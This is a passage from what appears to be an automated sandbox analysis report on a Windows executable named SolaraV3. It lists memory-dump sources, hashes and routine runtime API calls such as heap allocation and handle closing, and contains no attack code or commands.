                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction ID: 99d89fcde20f4cca788a140a4b8d814005db7b87fff77668cbe51f2059ecb85b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15313C21E0C24F45FE24AB66D4623BD56A1AF51384F445037E90EC72D7DE2EB927E342
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction ID: f9d3d3af3294862197e04d87239847d074eec55219d5f89e0c8bff4781cb6d92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD09210B0870E56FB283F74ACB907C52A67F88B41F14243AD80B86393ED2CB86F8301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction ID: 8909cbd613fb996e1adbe582df758805a12db95160e7ff03f5ba0144f44b099d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07512921B0928986F7649A2D942467E6691BF44BF4F18A737DD7D837C9CE3CE4239600
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction ID: d8f8231e8349ab292ba8546ab0b2e6506ccfc607cb20df7be546b439c22b0af1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0311C471B18A8581DA208B69A82416DB361FB45FF4F545332EE7D877D9CE7CD0228700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction ID: 0094c6eaa3d4d63496d20ff8e69808eeffa1c6b15ae0b44f8721ca82363fe342
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE08C50F0920E43FF296BF6A86513C5651AF88B00F455036C80EC22A2EE2CA8A78710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABC6
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6DC71A9D5,?,?,00000000,00007FF6DC71AA8A), ref: 00007FF6DC71ABD0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction ID: 0c11eec4320f1b1e243678bd6dbc2af7e9d367a760fc7e2fddad315d07596af5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821D811F1C68A41FAB157A994B037D12929F84BB0F18633BD92EC77D1CE6CE5634300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction ID: c65993b15f576a6d6c905b041e5978778d586cff82d162d69b6a1a4842970028
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9441E37291824987EA349B2DA56027D73A5EB59B90F142132EB9EC36D1CF3CE423CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: e52dbf74210c3068f283d652883a2533e96d5b0e990d8b056fb852a210ac9877
                                                                                                                                                                                                                              • Instruction ID: 43ac1281434680340e6cfb263e4c3bcf2b72f214817af0faecd78219c4513109
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e52dbf74210c3068f283d652883a2533e96d5b0e990d8b056fb852a210ac9877
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4621F721B1865A46FA109B2368143FE9661BF45BD4F8C5432EE4C8B786CE7EE063C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction ID: f8422d1c04b205098efb05b2fecd43552efd24ecbfcf616639df63dd37548e03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D31A462A1861A85F7116F6D886137C2A94BF80BA0F522237E95D933D2CF7CE4678711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction ID: eaf5c8eca6daf4d6e496b53cbd00a04a137c9a539a3609aa8592d1be781f906c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8521AE72E047898AEB249F68C4942EC37A0FB44718F442637D76D86AC5DF38D5A7C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 80008af62441f8f444589d6e03f262c18b15e8bfb9f3c72daf03557e33d7fd16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33118731E1C64981FAA59F19942017DA368BF85B94F546433FB4CD7B96CF3DD4228700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction ID: f3a74f9fbda2858e96c7fdfd1565a5dba3ee2ddc81fea37d2288d50cdd7beae5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A432A18A4587EB719F58D45037DB7A0FB84B54F24423AEA9DC76DADF3CD4228B00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: 6366436472c9eb8353529533f2eb0bfa139cdc9fdd466ed8a60788a2df9f1f45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801C821A0874940E604DF5B995006DA695BF86FE0F5C5632DE6C97BD6CE3CE4238300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                              • Instruction ID: f56a13c214a361c893b1f9058410c9ef5440578e9797bf3fae1d22332897dc35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C801DE20E0D68B40FE616B69652117E1A98AF247E0F546237FA1CD76CADF3CE473CA00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                              • Instruction ID: f3366009d493c80ef776051e6e1c7f1339fc37eb24446877b0518aaa1f623241
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BE08C90F0C60E87FA133BAC04A21BC11244FA5340F55A232ED08873C3DD6C68775621
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC71B32A,?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A), ref: 00007FF6DC71EBED
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                              • Instruction ID: 699b7c16cbe04b44acb68e32cd3b50197d2fa747267ac9395e4bab95021e8c1c
